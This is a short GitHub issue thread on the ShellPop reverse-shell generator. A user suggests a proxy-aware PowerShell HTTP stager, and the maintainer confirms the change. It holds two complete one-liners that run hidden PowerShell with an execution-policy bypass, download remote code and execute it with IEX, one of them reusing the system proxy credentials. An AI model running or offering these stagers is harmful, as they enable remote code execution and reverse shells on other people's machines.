### ISSUE TITLE
Powershell Suggestion

### ISSUE THREAD

**Issue by anantshri** [0x00-0x00/ShellPop#15]
Powershell reverse-shell  (number 22)
cmd used
`--number 22 -H localhost -P 2323 --reverse --stager http`

This will not work if the system is using proxy. taking cue from metasploit web delivery if we include 
```
powershell.exe -nop -w hidden -c $d=new-object net.webclient;$d.proxy=[Net.WebRequest]::GetSystemWebProxy();$d.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $d.downloadstring('<URL>');
```
instead of the current
```
powershell.exe -nop -ep bypass -Command 'iex (new-object system.net.webclient).downloadString(\"http://localhost:80/sfLkhXIg\")'
```

**Comment by 0x00-0x00** [comment]
Hey, thanks for the suggestion, again!

I have implemented this change in powershell HTTP staging and it will be merged as soon the "auto-complete" branch gets reviewed along with the other changes.

If you want to check the commit, go to "auto-complete" branch and browse latest commit: 08abbf2
